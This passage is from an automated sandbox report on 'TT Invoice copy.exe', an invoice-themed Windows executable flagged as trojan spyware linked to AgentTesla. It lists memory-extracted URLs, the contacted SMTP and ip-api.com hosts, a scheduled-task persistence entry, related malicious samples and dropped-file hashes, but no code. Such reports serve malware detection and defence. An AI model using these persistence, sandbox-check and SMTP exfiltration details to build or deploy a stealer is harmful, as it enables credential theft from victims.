                                          http://www.fontbureau.com/designers?TT Invoice copy.exe, 00000000.00000002.1685175816.0000000006942000.00000004.00000800.00020000.00000000.sdmpfalse
                                            		high
                                            http://www.tiro.comTT Invoice copy.exe, 00000000.00000002.1685175816.0000000006942000.00000004.00000800.00020000.00000000.sdmpfalse
                                            • URL Reputation: safe
                                            		unknown
                                            http://www.fontbureau.com/designersTT Invoice copy.exe, 00000000.00000002.1685175816.0000000006942000.00000004.00000800.00020000.00000000.sdmpfalse
                                              		high
                                              http://www.goodfont.co.krTT Invoice copy.exe, 00000000.00000002.1685175816.0000000006942000.00000004.00000800.00020000.00000000.sdmpfalse
                                              • URL Reputation: safe
                                              		unknown
                                              http://www.carterandcone.comlTT Invoice copy.exe, 00000000.00000002.1685175816.0000000006942000.00000004.00000800.00020000.00000000.sdmpfalse
                                              • URL Reputation: safe
                                              		unknown
                                              http://ip-api.com/line/?fields=hostingiTT Invoice copy.exe, 00000008.00000002.2885721948.0000000000E08000.00000004.00000020.00020000.00000000.sdmpfalse
                                                		high
                                                http://www.sajatypeworks.comTT Invoice copy.exe, 00000000.00000002.1685175816.0000000006942000.00000004.00000800.00020000.00000000.sdmpfalse
                                                • URL Reputation: safe
                                                		unknown
                                                http://www.typography.netDTT Invoice copy.exe, 00000000.00000002.1685175816.0000000006942000.00000004.00000800.00020000.00000000.sdmpfalse
                                                • URL Reputation: safe
                                                		unknown
                                                http://www.fontbureau.com/designers/cabarga.htmlNTT Invoice copy.exe, 00000000.00000002.1685175816.0000000006942000.00000004.00000800.00020000.00000000.sdmpfalse
                                                  		high
                                                  http://www.founder.com.cn/cn/cTheTT Invoice copy.exe, 00000000.00000002.1685175816.0000000006942000.00000004.00000800.00020000.00000000.sdmpfalseunknown
                                                  http://www.galapagosdesign.com/staff/dennis.htmTT Invoice copy.exe, 00000000.00000002.1685058068.0000000005830000.00000004.00000020.00020000.00000000.sdmp, TT Invoice copy.exe, 00000000.00000002.1685175816.0000000006942000.00000004.00000800.00020000.00000000.sdmpfalse
                                                  • URL Reputation: safe
                                                  		unknown
                                                  http://www.founder.com.cn/cnTT Invoice copy.exe, 00000000.00000002.1685175816.0000000006942000.00000004.00000800.00020000.00000000.sdmpfalseunknown
                                                  http://www.fontbureau.com/designers/frere-user.htmlTT Invoice copy.exe, 00000000.00000002.1685175816.0000000006942000.00000004.00000800.00020000.00000000.sdmpfalse
                                                    		high
                                                    http://www.jiyu-kobo.co.jp/TT Invoice copy.exe, 00000000.00000002.1685175816.0000000006942000.00000004.00000800.00020000.00000000.sdmpfalse
                                                    • URL Reputation: safe
                                                    		unknown
                                                    http://ip-api.comTT Invoice copy.exe, 00000008.00000002.2889363476.0000000002C81000.00000004.00000800.00020000.00000000.sdmp, pUAQmWA.exe, 0000000D.00000002.2888895822.00000000032D1000.00000004.00000800.00020000.00000000.sdmpfalse
                                                      		high
                                                      http://www.galapagosdesign.com/DPleaseTT Invoice copy.exe, 00000000.00000002.1685175816.0000000006942000.00000004.00000800.00020000.00000000.sdmpfalse
                                                      • URL Reputation: safe
                                                      		unknown
                                                      http://www.fontbureau.com/designers8TT Invoice copy.exe, 00000000.00000002.1685175816.0000000006942000.00000004.00000800.00020000.00000000.sdmpfalse
                                                        		high
                                                        http://ocsp.sectigo.com0ATT Invoice copy.exe, 00000008.00000002.2885721948.0000000000E9F000.00000004.00000020.00020000.00000000.sdmp, TT Invoice copy.exe, 00000008.00000002.2885721948.0000000000E8A000.00000004.00000020.00020000.00000000.sdmp, TT Invoice copy.exe, 00000008.00000002.2898221371.0000000006524000.00000004.00000020.00020000.00000000.sdmp, TT Invoice copy.exe, 00000008.00000002.2889363476.0000000002CDF000.00000004.00000800.00020000.00000000.sdmp, pUAQmWA.exe, 0000000D.00000002.2888895822.000000000332F000.00000004.00000800.00020000.00000000.sdmp, pUAQmWA.exe, 0000000D.00000002.2885567995.0000000001406000.00000004.00000020.00020000.00000000.sdmp, pUAQmWA.exe, 0000000D.00000002.2885567995.0000000001432000.00000004.00000020.00020000.00000000.sdmpfalse
                                                        • URL Reputation: safe
                                                        		unknown
                                                        http://www.fonts.comTT Invoice copy.exe, 00000000.00000002.1685175816.0000000006942000.00000004.00000800.00020000.00000000.sdmpfalse
                                                          		high
                                                          http://www.sandoll.co.krTT Invoice copy.exe, 00000000.00000002.1685175816.0000000006942000.00000004.00000800.00020000.00000000.sdmpfalse
                                                          • URL Reputation: safe
                                                          		unknown
                                                          http://www.urwpp.deDPleaseTT Invoice copy.exe, 00000000.00000002.1685175816.0000000006942000.00000004.00000800.00020000.00000000.sdmpfalse
                                                          • URL Reputation: safe
                                                          		unknown
                                                          http://www.zhongyicts.com.cnTT Invoice copy.exe, 00000000.00000002.1685175816.0000000006942000.00000004.00000800.00020000.00000000.sdmpfalseunknown
                                                          http://schemas.xmlsoap.org/ws/2005/05/identity/claims/nameTT Invoice copy.exe, 00000000.00000002.1681301766.00000000027D1000.00000004.00000800.00020000.00000000.sdmp, TT Invoice copy.exe, 00000008.00000002.2889363476.0000000002C81000.00000004.00000800.00020000.00000000.sdmp, pUAQmWA.exe, 00000009.00000002.1714095996.00000000024E8000.00000004.00000800.00020000.00000000.sdmp, pUAQmWA.exe, 0000000D.00000002.2888895822.00000000032D1000.00000004.00000800.00020000.00000000.sdmpfalse
                                                            		high
                                                            http://www.sakkal.comTT Invoice copy.exe, 00000000.00000002.1685175816.0000000006942000.00000004.00000800.00020000.00000000.sdmpfalse
                                                            • URL Reputation: safe
                                                            		unknown

                                                            World Map of Contacted IPs

                                                            • No. of IPs < 25%
                                                            • 25% < No. of IPs < 50%
                                                            • 50% < No. of IPs < 75%
                                                            • 75% < No. of IPs

                                                            Public IPs

                                                            IPDomainCountryFlagASNASN NameMalicious
                                                            208.91.198.143
                                                            		us2.smtp.mailhostbox.comUnited States
                                                            		394695PUBLIC-DOMAIN-REGISTRYUSfalse
                                                            208.95.112.1
                                                            		ip-api.comUnited States
                                                            		53334TUT-ASUSfalse

                                                            General Information

                                                            Joe Sandbox version:40.0.0 Tourmaline
                                                            Analysis ID:1426712
                                                            Start date and time:2024-04-16 14:10:07 +02:00
                                                            Joe Sandbox product:CloudBasic
                                                            Overall analysis duration:0h 7m 50s
                                                            Hypervisor based Inspection enabled:false
                                                            Report type:full
                                                            Cookbook file name:default.jbs
                                                            Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                            Number of analysed new started processes analysed:19
                                                            Number of new started drivers analysed:0
                                                            Number of existing processes analysed:0
                                                            Number of existing drivers analysed:0
                                                            Number of injected processes analysed:0
                                                            Technologies:
                                                            • HCA enabled
                                                            • EGA enabled
                                                            • AMSI enabled
                                                            Analysis Mode:default
                                                            Analysis stop reason:Timeout
                                                            Sample name:TT Invoice copy.exe
                                                            Detection:MAL
                                                            Classification:mal100.troj.spyw.evad.winEXE@20/15@2/2
                                                            EGA Information:
                                                            • Successful, ratio: 100%
                                                            HCA Information:
                                                            • Successful, ratio: 93%
                                                            • Number of executed functions: 154
                                                            • Number of non-executed functions: 9
                                                            Cookbook Comments:
                                                            • Found application associated with file extension: .exe

                                                            Warnings

                                                            • Exclude process from analysis (whitelisted): MpCmdRun.exe, WMIADAP.exe, SIHClient.exe, svchost.exe
                                                            • Excluded domains from analysis (whitelisted): fs.microsoft.com, ocsp.digicert.com, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                                                            • Not all processes where analyzed, report is missing behavior information
                                                            • Report size exceeded maximum capacity and may have missing behavior information.
                                                            • Report size getting too big, too many NtCreateKey calls found.
                                                            • Report size getting too big, too many NtOpenKeyEx calls found.
                                                            • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                            • Report size getting too big, too many NtQueryValueKey calls found.

                                                            Simulations

                                                            Behavior and APIs

                                                            TimeTypeDescription
                                                            13:10:57Task SchedulerRun new task: pUAQmWA path: C:\Users\user\AppData\Roaming\pUAQmWA.exe
                                                            14:10:56API Interceptor26x Sleep call for process: TT Invoice copy.exe modified
                                                            14:10:57API Interceptor26x Sleep call for process: powershell.exe modified
                                                            14:10:59API Interceptor23x Sleep call for process: pUAQmWA.exe modified

                                                            Joe Sandbox View / Context

                                                            IPs

                                                            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                            208.91.198.143MT103.exeGet hashmaliciousAgentTesla, PureLog StealerBrowse
                                                              Transmiison Remit.exeGet hashmaliciousAgentTeslaBrowse
                                                                account details ptgd.exeGet hashmaliciousAgentTeslaBrowse
                                                                  DHL-7654544CNT Pdf.exeGet hashmaliciousAgentTeslaBrowse
                                                                    SecuriteInfo.com.Trojan.PackedNET.2794.21912.2151.exeGet hashmaliciousAgentTeslaBrowse
                                                                      Prices.exeGet hashmaliciousAgentTeslaBrowse
                                                                        Best Price.exeGet hashmaliciousAgentTeslaBrowse
                                                                          UPS 095886.exeGet hashmaliciousAgentTeslaBrowse
                                                                            Payment Notification xlx PDF.exeGet hashmaliciousAgentTeslaBrowse
                                                                              PDF XLX PAYEMENT NOTIFICATION TLuSeofxe6MTPBV.exeGet hashmaliciousAgentTeslaBrowse
                                                                                208.95.112.1disktop.pif.exeGet hashmaliciousAgentTesla, DBatLoader, PureLog Stealer, RedLineBrowse
                                                                                • ip-api.com/line/?fields=hosting
                                                                                SecuriteInfo.com.Win32.CrypterX-gen.13367.14994.exeGet hashmaliciousAgentTeslaBrowse
                                                                                • ip-api.com/line/?fields=hosting
                                                                                rSHIPMENTSHIPPE.exeGet hashmaliciousAgentTeslaBrowse
                                                                                • ip-api.com/line/?fields=hosting
                                                                                Hj8wbvoT1k.exeGet hashmaliciousXehook StealerBrowse
                                                                                • ip-api.com/json/?fields=11827
                                                                                Hj8wbvoT1k.exeGet hashmaliciousXehook StealerBrowse
                                                                                • ip-api.com/json/?fields=11827
                                                                                af#U03b1.exeGet hashmaliciousAgentTeslaBrowse
                                                                                • ip-api.com/line/?fields=hosting
                                                                                rConfirmaci__nt.exeGet hashmaliciousAgentTeslaBrowse
                                                                                • ip-api.com/line/?fields=hosting
                                                                                z1TW987654569990.bat.exeGet hashmaliciousAgentTeslaBrowse
                                                                                • ip-api.com/line/?fields=hosting
                                                                                SecuriteInfo.com.Win32.CrypterX-gen.6113.26438.exeGet hashmaliciousAgentTeslaBrowse
                                                                                • ip-api.com/line/?fields=hosting
                                                                                Doc Inv & Packing list 04015032024.exeGet hashmaliciousAgentTeslaBrowse
                                                                                • ip-api.com/line/?fields=hosting

                                                                                Domains

                                                                                MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                us2.smtp.mailhostbox.comMT103.exeGet hashmaliciousAgentTesla, PureLog StealerBrowse
                                                                                • 208.91.198.143
                                                                                SecuriteInfo.com.Win32.PWSX-gen.22951.7290.exeGet hashmaliciousAgentTeslaBrowse
                                                                                • 208.91.199.224
                                                                                Transmiison Remit.exeGet hashmaliciousAgentTeslaBrowse
                                                                                • 208.91.199.223
                                                                                account details ptgd.exeGet hashmaliciousAgentTeslaBrowse
                                                                                • 208.91.198.143
                                                                                MT103 .exeGet hashmaliciousAgentTeslaBrowse
                                                                                • 208.91.199.223
                                                                                New Order 0048757.exeGet hashmaliciousAgentTeslaBrowse
                                                                                • 208.91.199.223
                                                                                DHL-7654544CNT Pdf.exeGet hashmaliciousAgentTeslaBrowse
                                                                                • 208.91.198.143
                                                                                SecuriteInfo.com.Trojan.PackedNET.2794.21912.2151.exeGet hashmaliciousAgentTeslaBrowse
                                                                                • 208.91.198.143
                                                                                Quote.exeGet hashmaliciousAgentTeslaBrowse
                                                                                • 208.91.199.224
                                                                                Quotation.exeGet hashmaliciousAgentTeslaBrowse
                                                                                • 208.91.199.225
                                                                                ip-api.comdisktop.pif.exeGet hashmaliciousAgentTesla, DBatLoader, PureLog Stealer, RedLineBrowse
                                                                                • 208.95.112.1
                                                                                SecuriteInfo.com.Win32.CrypterX-gen.13367.14994.exeGet hashmaliciousAgentTeslaBrowse
                                                                                • 208.95.112.1
                                                                                rSHIPMENTSHIPPE.exeGet hashmaliciousAgentTeslaBrowse
                                                                                • 208.95.112.1
                                                                                Hj8wbvoT1k.exeGet hashmaliciousXehook StealerBrowse
                                                                                • 208.95.112.1
                                                                                Hj8wbvoT1k.exeGet hashmaliciousXehook StealerBrowse
                                                                                • 208.95.112.1
                                                                                af#U03b1.exeGet hashmaliciousAgentTeslaBrowse
                                                                                • 208.95.112.1
                                                                                rConfirmaci__nt.exeGet hashmaliciousAgentTeslaBrowse
                                                                                • 208.95.112.1
                                                                                z1TW987654569990.bat.exeGet hashmaliciousAgentTeslaBrowse
                                                                                • 208.95.112.1
                                                                                SecuriteInfo.com.Win32.CrypterX-gen.6113.26438.exeGet hashmaliciousAgentTeslaBrowse
                                                                                • 208.95.112.1
                                                                                Doc Inv & Packing list 04015032024.exeGet hashmaliciousAgentTeslaBrowse
                                                                                • 208.95.112.1

                                                                                ASNs

                                                                                MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                PUBLIC-DOMAIN-REGISTRYUSMT103.exeGet hashmaliciousAgentTesla, PureLog StealerBrowse
                                                                                • 208.91.198.143
                                                                                SecuriteInfo.com.Win32.PWSX-gen.22951.7290.exeGet hashmaliciousAgentTeslaBrowse
                                                                                • 208.91.199.224
                                                                                Transmiison Remit.exeGet hashmaliciousAgentTeslaBrowse
                                                                                • 208.91.199.224
                                                                                account details ptgd.exeGet hashmaliciousAgentTeslaBrowse
                                                                                • 208.91.198.143
                                                                                MT103 .exeGet hashmaliciousAgentTeslaBrowse
                                                                                • 208.91.199.223
                                                                                New Order 0048757.exeGet hashmaliciousAgentTeslaBrowse
                                                                                • 208.91.199.223
                                                                                receipt-73633T36X90N.exeGet hashmaliciousAgentTeslaBrowse
                                                                                • 162.222.226.100
                                                                                https://inaeevent.in/wea23/fl/file.phpGet hashmaliciousUnknownBrowse
                                                                                • 119.18.54.39
                                                                                DHL-7654544CNT Pdf.exeGet hashmaliciousAgentTeslaBrowse
                                                                                • 208.91.198.143
                                                                                https://sprl.in/ZGOwNQaGet hashmaliciousUnknownBrowse
                                                                                • 216.10.243.64
                                                                                TUT-ASUSdisktop.pif.exeGet hashmaliciousAgentTesla, DBatLoader, PureLog Stealer, RedLineBrowse
                                                                                • 208.95.112.1
                                                                                SecuriteInfo.com.Win32.CrypterX-gen.13367.14994.exeGet hashmaliciousAgentTeslaBrowse
                                                                                • 208.95.112.1
                                                                                rSHIPMENTSHIPPE.exeGet hashmaliciousAgentTeslaBrowse
                                                                                • 208.95.112.1
                                                                                Hj8wbvoT1k.exeGet hashmaliciousXehook StealerBrowse
                                                                                • 208.95.112.1
                                                                                Hj8wbvoT1k.exeGet hashmaliciousXehook StealerBrowse
                                                                                • 208.95.112.1
                                                                                af#U03b1.exeGet hashmaliciousAgentTeslaBrowse
                                                                                • 208.95.112.1
                                                                                rConfirmaci__nt.exeGet hashmaliciousAgentTeslaBrowse
                                                                                • 208.95.112.1
                                                                                z1TW987654569990.bat.exeGet hashmaliciousAgentTeslaBrowse
                                                                                • 208.95.112.1
                                                                                SecuriteInfo.com.Win32.CrypterX-gen.6113.26438.exeGet hashmaliciousAgentTeslaBrowse
                                                                                • 208.95.112.1
                                                                                Doc Inv & Packing list 04015032024.exeGet hashmaliciousAgentTeslaBrowse
                                                                                • 208.95.112.1

                                                                                JA3 Fingerprints

                                                                                No context

                                                                                Dropped Files

                                                                                No context

                                                                                Created / dropped Files

                                                                                C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\TT Invoice copy.exe.log

                                                                                Download File
                                                                                Process:C:\Users\user\Desktop\TT Invoice copy.exe
                                                                                File Type:ASCII text, with CRLF line terminators
                                                                                Category:modified
                                                                                Size (bytes):1216
                                                                                Entropy (8bit):5.34331486778365
                                                                                Encrypted:false
                                                                                SSDEEP:24:MLUE4K5E4KH1qE4qXKDE4KhKiKhPKIE4oKNzKoZAE4Kze0E4x84j:MIHK5HKH1qHiYHKh3oPtHo6hAHKze0HJ
                                                                                MD5:1330C80CAAC9A0FB172F202485E9B1E8
                                                                                SHA1:86BAFDA4E4AE68C7C3012714A33D85D2B6E1A492
                                                                                SHA-256:B6C63ECE799A8F7E497C2A158B1FFC2F5CB4F745A2F8E585F794572B7CF03560
                                                                                SHA-512:75A17AB129FE97BBAB36AA2BD66D59F41DB5AFF44A705EF3E4D094EC5FCD056A3ED59992A0AC96C9D0D40E490F8596B07DCA9B60E606B67223867B061D9D0EB2
                                                                                Malicious:false
                                                                                Reputation:high, very likely benign file
                                                                                Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\8b2c1203fd20aea8260bfbc518004720\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\2192b0d5aa4aa14486ae08118d3b9fcc\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\2062ed810929ec0e33254c02

                                                                                C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\pUAQmWA.exe.log

                                                                                Download File
                                                                                Process:C:\Users\user\AppData\Roaming\pUAQmWA.exe
                                                                                File Type:ASCII text, with CRLF line terminators
                                                                                Category:dropped
                                                                                Size (bytes):1216
                                                                                Entropy (8bit):5.34331486778365
                                                                                Encrypted:false
                                                                                SSDEEP:24:MLUE4K5E4KH1qE4qXKDE4KhKiKhPKIE4oKNzKoZAE4Kze0E4x84j:MIHK5HKH1qHiYHKh3oPtHo6hAHKze0HJ
                                                                                MD5:1330C80CAAC9A0FB172F202485E9B1E8
                                                                                SHA1:86BAFDA4E4AE68C7C3012714A33D85D2B6E1A492
                                                                                SHA-256:B6C63ECE799A8F7E497C2A158B1FFC2F5CB4F745A2F8E585F794572B7CF03560
                                                                                SHA-512:75A17AB129FE97BBAB36AA2BD66D59F41DB5AFF44A705EF3E4D094EC5FCD056A3ED59992A0AC96C9D0D40E490F8596B07DCA9B60E606B67223867B061D9D0EB2
                                                                                Malicious:false
                                                                                Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\8b2c1203fd20aea8260bfbc518004720\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\2192b0d5aa4aa14486ae08118d3b9fcc\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\2062ed810929ec0e33254c02

                                                                                C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                                                                Download File
                                                                                Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                File Type:data
                                                                                Category:modified
                                                                                Size (bytes):2232
                                                                                Entropy (8bit):5.380805901110357
                                                                                Encrypted:false
                                                                                SSDEEP:48:lylWSU4y4RQmFoUeWmfgZ9tK8NPZHUm7u1iMuge//8PUyus:lGLHyIFKL3IZ2KRH9Oug8s
                                                                                MD5:F9B7CF60C22DBE6B73266580FFD54629
                                                                                SHA1:05ED734C0A5EF2ECD025D4E39321ECDC96612623
                                                                                SHA-256:880A3240A482AB826198F84F548F4CB5B906E4A2D7399D19E3EF60916B8D2D89
                                                                                SHA-512:F55EFB17C1A45D594D165B9DC4FA2D1364B38AA2B0D1B3BAAE6E1E14B8F3BD77E3A28B7D89FA7F6BF3EEF3652434228B1A42BF9851F2CFBB6A7DCC0254AAAE38
                                                                                Malicious:false
                                                                                Preview:@...e.................................^..............@..........P................1]...E.....j.....(.Microsoft.PowerShell.Commands.ManagementH...............o..b~.D.poM......... .Microsoft.PowerShell.ConsoleHost0......................C.l]..7.s........System..4....................D...{..|f........System.Core.D...............4..7..D.#V.............System.Management.AutomationL.................*gQ?O.....x5.......#.Microsoft.Management.Infrastructure.<................t.,.lG....M...........System.Management...@................z.U..G...5.f.1........System.DirectoryServices4.................%...K... ...........System.Xml..8..................1...L..U;V.<}........System.Numerics.4.....................@.[8]'.\........System.Data.<...............i..VdqF...|...........System.ConfigurationH................WY..2.M.&..g*(g........Microsoft.PowerShell.Security...<...............V.}...@...i...........System.Transactions.P...............8..{...@.e..."4.......%.Microsoft.PowerShell.Com

                                                                                C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_1ctszxgt.y0o.ps1

                                                                                Download File
                                                                                Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                File Type:ASCII text, with no line terminators
                                                                                Category:dropped
                                                                                Size (bytes):60
                                                                                Entropy (8bit):4.038920595031593
                                                                                Encrypted:false
                                                                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                Malicious:false
                                                                                Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_cdakaqju.ry5.ps1

                                                                                Download File
                                                                                Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                File Type:ASCII text, with no line terminators
                                                                                Category:dropped
                                                                                Size (bytes):60
                                                                                Entropy (8bit):4.038920595031593
                                                                                Encrypted:false
                                                                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                Malicious:false
                                                                                Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_iltncthy.5os.psm1

                                                                                Download File
                                                                                Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                File Type:ASCII text, with no line terminators
                                                                                Category:dropped
                                                                                Size (bytes):60
                                                                                Entropy (8bit):4.038920595031593
                                                                                Encrypted:false
                                                                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                Malicious:false
                                                                                Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_ohqsmnpu.obt.psm1

                                                                                Download File
                                                                                Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                File Type:ASCII text, with no line terminators
                                                                                Category:dropped
                                                                                Size (bytes):60
                                                                                Entropy (8bit):4.038920595031593
                                                                                Encrypted:false
                                                                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                Malicious:false
                                                                                Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_rhqmmrpm.zyl.psm1

                                                                                Download File
                                                                                Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                File Type:ASCII text, with no line terminators
                                                                                Category:dropped
                                                                                Size (bytes):60
                                                                                Entropy (8bit):4.038920595031593
                                                                                Encrypted:false
                                                                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                Malicious:false
                                                                                Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_vy1ivhay.5cf.psm1

                                                                                Download File
                                                                                Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                File Type:ASCII text, with no line terminators
                                                                                Category:dropped
                                                                                Size (bytes):60
                                                                                Entropy (8bit):4.038920595031593
                                                                                Encrypted:false
                                                                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                Malicious:false
                                                                                Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_x42210hw.nbv.ps1

                                                                                Download File
                                                                                Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                File Type:ASCII text, with no line terminators
                                                                                Category:dropped
                                                                                Size (bytes):60
                                                                                Entropy (8bit):4.038920595031593
                                                                                Encrypted:false
                                                                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                Malicious:false
                                                                                Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_xtbwom4y.nds.ps1

                                                                                Download File
                                                                                Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                File Type:ASCII text, with no line terminators
                                                                                Category:dropped
                                                                                Size (bytes):60
                                                                                Entropy (8bit):4.038920595031593
                                                                                Encrypted:false
                                                                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                Malicious:false
                                                                                Preview:# PowerShell test file to determine AppLocker lockdown mode

